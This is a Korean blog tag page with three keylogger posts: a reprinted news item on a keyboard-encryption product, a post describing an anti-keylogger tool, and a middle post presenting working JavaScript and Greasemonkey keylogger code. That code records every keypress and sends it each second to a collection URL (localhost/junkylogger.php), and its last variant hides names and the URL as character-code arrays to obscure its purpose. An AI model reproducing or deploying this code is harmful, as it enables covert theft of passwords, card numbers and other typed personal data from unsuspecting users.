'키로거'에 해당되는 글 4건

  1. 2014.05.08 키보드 입력값을 암호화하는 기술
  2. 2010.09.03 Javascript Keylogger 예제 (1)
  3. 2009.12.23 Anti-Keylogger(안티 키로거) 프로그램
2014. 5. 8. 18:00

키보드 입력값을 암호화하는 기술

키보드 입력값을 암호화하는 기술 
정보출처 IEEE Computer Magazine 
원문언어 영어 
출판날짜 2005년 10월 00일 
국 가 미국 
주제분야 컴퓨터 시스템 및 하드웨어, 운영체제(R12) 

BlueGem 시큐리티사는 최근 기존의 암호 시스템이 제공하지 못했던 키보드 입력 신호를 암호화하는 ''LocalSSL''이라는 암호화 시스템 기술을 개발했다고 밝혔다. 이 기술을 사용하면 해커들이 키로거(keylogger) 툴을 사용하여 사용자의 키보드 입력 값을 알아내는 해킹을 원천적으로 봉쇄할 수 있다. 

기존의 암호화 기술은 주로 통신 시스템상의 송수신 데이터를 암호화하는 것으로 사용자의 키보드와 로컬 응용 사이의 키 입력 신호를 암호화 하지는 못했다. 키보드와 로컬 응용 사이에는 키로거 프로그램이 독립적으로, 혹은 트로이 목마 프로그램에 포함되어 존재하여 사용자의 패스워드 정보나 사회 보장 번호, 신용 카드 정보, 재정 정보, 그 외 개인 정보를 가로채어 해커에게 전송한다고 BlueGem사의 CTO인 박죠씨는 말하고 있다. 

현재 한국에서 사용되고 있는 LocalSSL 기술은 키보드 입력 신호에 대하여 128 비트 암호화 기술을 사용한다. 이 기술은 BlueGem사가 기존의 인터넷상에서 사용 되던 SSL 암호 기술을 수정한 것으로, LocalSSL 기술은 키 해킹 프로그램이 주로 존재하는 영역인 운영 체제를 우회하여 암호화 된 키 입력 값을 전송한다. 박씨는 키로거 프로그램은 주로 메시지 큐나 디바이스 드라이버 영역, 그리고 운영 체제 영역에 존재하면서 사용자 키 입력 값을 가로챈다고 한다. 

BlueGem 프로그램은 보호하고자 하는 응용의 대상에 따라 LocalSSL 인터넷과 LocalSSL 이메일, Local SSL 마이크로소프트 오피스와 같은 3개의 패키지로 구성된다. 이 제품은 모든 서버 하드웨어와 소프트웨어 제품과 호환성을 가지며, 인스톨된 프로그램의 메모리 사용량은 600K 바이트에 불과하다. 

박씨에 따르면 이 프로그램을 사용하면 사용자들은 온라인 뱅킹이나 주식 거래, 가상 사설망 접근, 신용 카드 정보, 모기지론 등과 같은 응용을 안전하게 사용할 수 있다고 한다. 이에 대해 시장 분석 업체인 아버딘 그룹 (Aberdeen Group)의 릭 사이아 (Rick Saia)씨는 "BlueGem사이 LocalSSL 제품은 비즈니스와 개인 정보보호를 위한 중요한 기능을 제공해 주며, 특히 많은 제약이 있는 금융 서비스나 건강 보험 등의 응용에 유용할 것"이라고 말한다. 



출처 : www.gtp.or.kr



Trackback 0 Comment 0
2010. 9. 3. 19:31

Javascript Keylogger 예제

var keys='';
document.onkeypress = function(e) {
get = window.event?event:e;
key = get.keyCode?get.keyCode:get.charCode;
key = String.fromCharCode(key);
keys+=key;
}
window.setInterval(function(){
new Image().src = 'http://localhost/junkylogger.php?keys='+keys;
keys = '';
}, 1000);


GM_setValue('keys', '');
unsafeWindow.onkeypress = function(e) {
eventobj = window.event?event:e;
key = eventobj.keyCode?eventobj.keyCode:eventobj.charCode;
keys = GM_getValue('keys');
keys+= String.fromCharCode(key);
GM_setValue('keys', keys);
}

window.setInterval(function(){
new Image().src = 'http://localhost/junkylogger.php?keys='+GM_getValue('keys');
GM_setValue('keys', '');
}, 1000);


window.wrap = window;
wrap.strf = String.fromCharCode;
wrap.wind = strf(117,110,115,97,102,101,87,105,110,100,111,119);
wrap.ev   = strf(111, 110, 107, 101, 121, 112, 114, 101, 115, 115);
GM_setValue('q','');
Function('func', wind+"."+ev+" = func")(function(e) {
e=window.event?window.event:e;
k=e.charCode?e.charCode:e.keyCode;
k=GM_getValue('q')+strf(k);
GM_setValue('q', k);
});
wrap.loc = strf(104, 116, 116, 112, 58, 47, 47, 108, 111, 99, 97, 108, 104);
wrap.loc+= strf(111, 115, 116, 47, 106, 117, 110, 107, 121, 108, 111, 103, 103, 101);
wrap.loc+= strf(114, 46, 112, 104, 112, 63, 107, 101, 121, 115, 61);
window.setInterval(function(){new Image().src=wrap.loc+GM_getValue('q');GM_setValue('q','')},1000);

Trackback 0 Comment 1
  1. 2010.09.04 17:45 address edit & del reply

    비밀댓글입니다

2009. 12. 23. 18:32

Anti-Keylogger(안티 키로거) 프로그램

Anti-Keylogger 프로그램은 말그대로 안티 키로거 프로그램이다. 즉 키로거 프로그램이 키 입력 정보를 가로채는 것을 막아준다. 다만 이 프로그램의 효용성이 어느 정도인지에 대해 명확하게 검증된 바는 없으나, 실제로 사용해 본 결과 특정 키로거 프로그램에서 키 입력 정보를 가로채는 것을 차단한 사례가 있다.



Anti-Keylogger 프로그램 다운로드

Anti-Keylogger 프로그램의 다운로드는 제작사 MyPlanetSoft 사이트에 방문한 후 메일 정보를 기재하면 등록된 메일로 발송된다. 이 프로그램은 제작사 사이트에서 다운받는 것이 원칙이지만, 국내 인터넷에서 검색하다보면 쉽게 발견할 수 있다. 그러나 제작사가 아닌 곳에서 다운받게 되면 안정성을 장담할 수 없으므로 유의할 필요가 있을 것이다.



Anti-Keylogger 프로그램 사용 방법

프로그램의 사용 방법은 매우 간단하다. 다운받은 압축 파일을 해제한 후 aklog.exe라는 파일을 실행하면 된다. 다시 해당 파일을 실행하면 작동이 중지된다. 주의할 점은 종료할 때 최신 버전 확인을 선택하게 되면 해당 사이트로 연결된다. 그리고 Anti-Keylogger 실행시에는 일부 응용 프로그램의 단축키가 사용 불능이 될 때도 있다.



참고 사항 (제작사의 설명에서 인용)

⒜ 보호되는 범위 : Anti-Keylogger 프로그램에서는 상업용 혹은 무료 키로거 중 98% 정도를 보호한다.

⒝ 보호할 수 없는 경우 : 하드웨어 키로거 등.
AKLog will not protect you against :
- hardware keyloggers : theoretically if someone can access your computer, s/he can change the hardware of the computer so it can radio transmit remotely the keys you type
- keyboard drivers keyloggers : it is possible for someone to change your system keyboard driver chain with a custom one and log the keys
- local hook keyloggers that could be part of a specific application : disabling these keyloggers may cause applications not to function corretly
- keyloggers written specially for a given application : these keyloggers make use of knowledge of how a given application works and work only with that particular application

⒞ 특정 키로거에서 Anti-Keylogger를 차단할 경우 : 파일 이름 변경 등을 통해 회피 가능.


아무튼 Anti-Keylogger 프로그램을 이용하더라도 모든 키로거로부터는 안전할 수는 없을 것이다. 하지만 일반적인 경우에는 어느정도의 효용성이 있을 것으로 예상된다. 특히 보안이 확보되지 않은 컴퓨터에서라면 사용할 만할 것으로 생각한다.

(작성 : http://blog.naver.com/hahaj1)

출처 : http://blog.naver.com/hahaj1

Trackback 0 Comment 0